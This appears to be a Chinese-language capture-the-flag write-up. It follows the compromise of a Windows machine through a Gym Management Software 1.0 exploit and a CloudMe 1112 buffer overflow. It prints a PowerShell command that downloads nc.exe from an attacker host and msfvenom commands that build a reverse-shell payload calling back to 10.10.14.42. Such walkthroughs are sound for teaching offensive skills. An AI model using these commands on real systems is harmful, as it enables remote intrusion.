nmap
目录扫描
测试了邮件登录是否存在sql注入,是否存在XSS,再查看了源码还有一些可以查看的页面后,收获如下。
© Projectworlds.in 应该是一个,额,顾名思义项目世界用来提供项目服务的。
Gym Management Software 1.0 健身房管理软件,进一步搜索能找到更多信息。
能找到Gym Management System 1.0
。
exploit-db
上能找到一些利用。
前三个需要在/gym/
的目录里面某文件上操作,因为我们没有收集到有关这个/gym/
目录的信息,只能暂时放弃。
把第四个下载下来看看。
使用第四个能获得一个不怎么方便的shell。
要么上传个nc.exe
来反弹更方便,要么先收集信息然后一步到位到root。
powershell "(new-object System.Net.WebClient).Downloadfile('http://ip:port/nc.exe', 'nc.exe')"
先收集信息,不着急反弹。
这本地两个端口运行的什么呢?
127.0.0.1:3306
127.0.0.1:8888
一个一个排除并测试也可以,不过可以考虑再找找有没有什么有用的信息。
因为这个shell有点不方便,反弹后继续收集信息。
这个CloudMe_1112.exe
的_1112是不是版本1.11.2。
选了个最短的试试。
忽然瞟见一句话。
以及一个venom,需要我们自己更改。
先用chisel把端口转过来。
照着它的修改或者删减一部分。
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.42 LPORT=4321 -b '\x00\x0A\x0D' -f python
但是他生成的负载变量名有些问题。
在后面加上-v。
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.42 LPORT=4321 -b '\x00\x0A\x0D' -f python -v payload
或者在代码里面改。
然后执行脚本。